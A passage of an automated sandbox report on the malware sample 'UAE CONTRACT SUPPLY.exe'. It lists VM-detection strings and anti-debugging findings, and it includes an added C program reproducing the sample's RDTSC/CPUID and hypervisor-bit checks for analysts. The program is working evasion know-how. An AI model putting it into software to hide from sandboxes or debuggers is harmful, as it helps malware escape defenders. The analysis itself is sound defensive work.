      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, UAE CONTRACT SUPPLY.exe, 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe9
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 0000000D.00000002.649228259.000000000641C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000D.00000000.499784826.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 0000000D.00000002.648636841.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
      Source: explorer.exe, 0000000D.00000000.499476016.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: UAE CONTRACT SUPPLY.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 0000000D.00000000.499476016.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 0000000D.00000000.499829502.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: explorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information queried: ProcessInformation
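The RDTSC interceptor entries above are three stacked measurements rather than one: an RDTSC read around CPUID leaf 1 (`xor eax, eax; inc eax; cpuid`), the hypervisor-present test on CPUID.1:ECX bit 31 (`bt ecx, 1Fh; jc`), and a loop that re-reads KUSER_SHARED_DATA.SystemTime at 0x7FFE0014 on every pass and subtracts the previous value, so the loader sees both the cycle cost of a VM exit and the wall-clock cost of being single-stepped or instrumented. The program below is an added example written for this page; it is not code from the sample or from the report. It reproduces those three checks with GCC/Clang x86 intrinsics, replaces the Windows-only shared-data read with `clock_gettime`, and uses an assumed 1000-cycle decision threshold (the sample's own threshold is not visible in the dumps). On a non-x86 build the measurement functions compile to a zero-returning fallback.

```c
#define _POSIX_C_SOURCE 199309L   /* clock_gettime / CLOCK_MONOTONIC */
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__)
#  include <x86intrin.h>   /* __rdtsc */
#  include <cpuid.h>       /* __cpuid, __get_cpuid */
#  define HAVE_X86 1
#  define LFENCE() __asm__ __volatile__("lfence" ::: "memory")
#else
#  define HAVE_X86 0       /* no RDTSC/CPUID here: measurements return 0 */
#endif

/* One sample of the check seen in the dumps: RDTSC, CPUID leaf 1
 * ("xor eax,eax; inc eax; cpuid"), RDTSC again.  CPUID is an unconditional
 * VM exit under VT-x/AMD-V, so the bracketed cycle count balloons when a
 * hypervisor is in the path.  LFENCE keeps RDTSC from executing early. */
static uint64_t cpuid_cycles_once(void)
{
#if HAVE_X86
    unsigned a, b, c, d;
    uint64_t t0, t1;
    LFENCE();
    t0 = __rdtsc();
    __cpuid(1, a, b, c, d);
    LFENCE();
    t1 = __rdtsc();
    (void)a; (void)b; (void)c; (void)d;
    return t1 - t0;
#else
    return 0;
#endif
}

/* Minimum over several rounds: interrupts, cache misses and core migration
 * only ever inflate a sample, so the minimum is the cleanest estimate. */
static uint64_t cpuid_cycles_min(int rounds)
{
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < rounds; i++) {
        uint64_t d = cpuid_cycles_once();
        if (d < best) best = d;
    }
    return best;
}

/* The decision.  Bare metal is typically in the low hundreds of cycles; with
 * a hypervisor it is typically well above 1000.  The threshold is an
 * assumption for this example, not a value taken from the sample. */
#define VM_CYCLE_THRESHOLD 1000u

static int timing_says_virtualised(uint64_t min_cycles, uint64_t threshold)
{
    return min_cycles > threshold;
}

/* Second check in the dumps: "cpuid; bt ecx, 1Fh; jc ..." tests CPUID.1:ECX
 * bit 31, the hypervisor-present bit most hypervisors report by default. */
static int hypervisor_bit_set(void)
{
#if HAVE_X86
    unsigned a, b, c, d;
    if (!__get_cpuid(1, &a, &b, &c, &d))
        return 0;
    return (int)((c >> 31) & 1u);
#else
    return 0;
#endif
}

/* Third check: the first dump loops over CPUID and on each pass re-reads
 * KUSER_SHARED_DATA.SystemTime (0x7FFE0014 on Windows) and subtracts the
 * previous value, i.e. wall-clock time per iteration.  Same idea with a
 * portable clock: microseconds needed to execute CPUID `n` times. */
static double cpuid_wall_us(int n)
{
    struct timespec s, e;
    clock_gettime(CLOCK_MONOTONIC, &s);
    for (int i = 0; i < n; i++)
        (void)cpuid_cycles_once();
    clock_gettime(CLOCK_MONOTONIC, &e);
    return (double)(e.tv_sec - s.tv_sec) * 1e6
         + (double)(e.tv_nsec - s.tv_nsec) / 1e3;
}

int main(void)
{
    uint64_t cyc = cpuid_cycles_min(64);
    printf("min CPUID cost  : %llu cycles -> %s\n", (unsigned long long)cyc,
           timing_says_virtualised(cyc, VM_CYCLE_THRESHOLD) ? "hypervisor-like"
                                                             : "bare-metal-like");
    printf("CPUID.1:ECX[31] : %d\n", hypervisor_bit_set());
    printf("1000 x CPUID    : %.1f us\n", cpuid_wall_us(1000));
    return 0;
}
```

Build with `gcc -O2 anti_vm_timing.c` and run it once on bare metal and once inside the analysis VM: the minimum CPUID cost is the number that separates the two, and it survives RDTSC offsetting far better than a single sample does, which is why the loader takes the minimum of many rounds. The hypervisor bit is the cheap one to hide (`hypervisor.cpuid.v0 = "FALSE"` in a VMware .vmx, `-cpu host,-hypervisor` for QEMU/KVM); the cycle cost of the CPUID exit itself is not, so a sandbox that wants to survive this check has to either trap and rewrite RDTSC consistently or accept detection and rely on the network-level indicators instead.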

      Anti Debugging:

Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226054E NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000
Hides threads from debuggers
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022608D0 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02263A1C LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02264B16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02264FBF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226206F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262078 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022658C3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262CDC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022658DB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022619AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E508EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5446A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5037F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5814FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E503D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E543540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E54A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E578DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5905AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E554257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E504A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5453CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E595BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E582073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E591074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E594015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E594015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E543884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E543884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5090AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov ecx, dword ptr fs:[00000030h]
